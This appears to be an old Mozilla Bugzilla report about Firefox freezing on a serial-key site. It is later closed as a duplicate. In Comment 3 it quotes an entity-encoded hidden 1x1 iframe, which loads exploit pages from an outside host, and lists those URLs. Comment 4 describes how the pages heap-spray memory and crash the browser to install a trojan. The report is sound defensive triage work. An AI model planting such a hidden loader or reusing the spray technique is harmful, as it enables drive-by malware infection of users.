browser freezes because of an illegal script

RESOLVED DUPLICATE of bug 317334

Status

()

--
critical
RESOLVED DUPLICATE of bug 317334
13 years ago
13 years ago

People

(Reporter: fignamoya, Assigned: dveditz)

Tracking

1.8 Branch
x86
Windows XP
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5

Browser freezes due to an illegal script on a page. This, in turn causes all firefox windows to close.

Reproducible: Always

Steps to Reproduce:
1. go to http://www.serials.ws/all/?l=v&pn=3
2. ctrl+f and search 1301 on the page (javascript link to visual assist x... 1301)
3. click on the link and observe how the browser runs cpu usage to 100%
(Reporter)

Updated

13 years ago
Version: unspecified → 1.5 Branch
Component: General → Layout
Product: Firefox → Core
QA Contact: general → layout
Version: 1.5 Branch → 1.8 Branch
Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.9a1) Gecko/20051215 Firefox/1.6a1 ID:2005121500
I see this too.
(Reporter)

Comment 2

13 years ago
in addition this appears to disable block popups option in the browser
Component: Layout → JavaScript Engine

Comment 3

13 years ago
view-source:http://www.serials.ws/all/?l=v&pn=3

<a href=javascript:d(170307)>Visual Assist X 10.1.1301</a> :: 2005-04-30 

http://www.serials.ws/serws.js

function d(id){ 
window.open('/d.php?n='+id,'Operate','toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,width=650,height=550');
}

view-source:http://www.serials.ws/d.php?170307

this page contains an iframe:
<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#116;&#111;&#111;&#108;&#98;&#97;&#114;&#117;&#114;&#108;&#46;&#98;&#105;&#122;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#54;&#54;&#49;&#46;&#112;&#104;&#112;" width=1 height=1></iframe> 

the iframe loads:
view-source:http://toolbarurl.biz/dl/adv661.php

this in turn loads 8 iframes:
view-source:http://toolbarurl.biz/dl/fillmemadv661.htm

and 1 iframe:
view-source:http://toolbarurl.biz/dl/bag.htm

Comment 4

13 years ago
seen with the view-source: prefixed, the URLs in comment 3 are harmless.

view-source:http://toolbarurl.biz/dl/fillmemadv661.htm
fills the memory with with 100000 times an returnadress, and then a short piece of code, 586 words.

memory is filled by 8 iframes of this type, and the bag.html seems to be used to produce a crash, hopefully landing in one of those long regions leading to the exploit code.

google search for ADV661 shows it is a trojan:

http://sandbox.norman.no/live_2.html?logfile=437547
http://www.sophos.com/virusinfo/analyses/trojdownldrdl.html

If you've been on the site, read the reports to check if you are infected.
I don't want to try going to this site with js enabled.

I'm setting component to Security, so dveditz@cruzio.com can look if we are in danger, or if it's just a hang.
Assignee: nobody → dveditz
Status: UNCONFIRMED → NEW
Component: JavaScript Engine → Security
Ever confirmed: true
QA Contact: layout → toolkit

Comment 5

13 years ago
Similar scripts used in
Bug 320760 Browser hangs at 100% CPU following document.write by malicious javascript
Bug 317334 hang when long wrappable string is passed to prompt() [e.g. as used in the exploit for IE's <body onload=window()> bug]

*** This bug has been marked as a duplicate of 317334 ***
Status: NEW → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.